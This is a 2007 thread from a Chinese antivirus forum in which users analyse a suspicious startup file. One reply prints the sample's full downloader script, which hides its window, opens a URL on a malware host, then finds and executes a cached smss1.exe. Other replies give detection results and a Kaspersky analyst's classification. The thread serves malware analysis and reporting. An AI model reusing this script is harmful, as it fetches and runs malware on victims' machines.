查看: 3039|回复: 11
收起左侧

[病毒样本] 可疑,竟然在程序的启动项里 [MD5: 3927C1]

[复制链接]
一派胡言
发表于 2007-6-13 19:34:43 | 显示全部楼层 |阅读模式

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wj730327
发表于 2007-6-13 19:36:41 | 显示全部楼层
过了AVK2006,小红伞
dikex
发表于 2007-6-13 19:41:28 | 显示全部楼层
里面的主要内容,用于用IE访问有毒网页的:


  1. <html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://y66.us/oKK/Url2.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\smss1[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>
复制代码
Anycall-D908
发表于 2007-6-13 19:41:29 | 显示全部楼层
NOD32静态扫描没报,可以激活后网页监控发现了.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
allenhippo
发表于 2007-6-13 19:44:25 | 显示全部楼层
这个y66.us就是以前的那个5y5.us/16a.us

一直流行的,好几个月了
hjy881212
发表于 2007-6-13 21:50:47 | 显示全部楼层
哇!
真的太吓人啦!
小邪邪
发表于 2007-6-13 22:43:33 | 显示全部楼层
1K的东西也不可小看
wangjay1980
发表于 2007-6-13 22:51:05 | 显示全部楼层
detected: virus Virus.Win32.AutoRun.am        URL: http://y66.us/oKK/smss1.exe//PE_Patch.UPX//UPX
aerbeisi
发表于 2007-6-13 22:51:25 | 显示全部楼层
这个就是autorun病毒更新的网址,常去常新。

主要是针对卡巴改时间的,因为卡巴自我防护很好,病毒只能通过修改时间让key失效,从而使卡巴监控失效,然后在失效的时候疯狂下载病毒。

这个病毒已经跟卡巴干上了,卡巴处理这个病毒,入库这个病毒的速度要比一般病毒快。

[ 本帖最后由 aerbeisi 于 2007-6-13 22:53 编辑 ]
wangjay1980
发表于 2007-6-13 23:09:38 | 显示全部楼层
Hello,

Server.hta - Trojan-Downloader.HTA.Agent.l

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Yaroslav Kirillov
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: Server.zip
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-8 06:18 , Processed in 0.133976 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表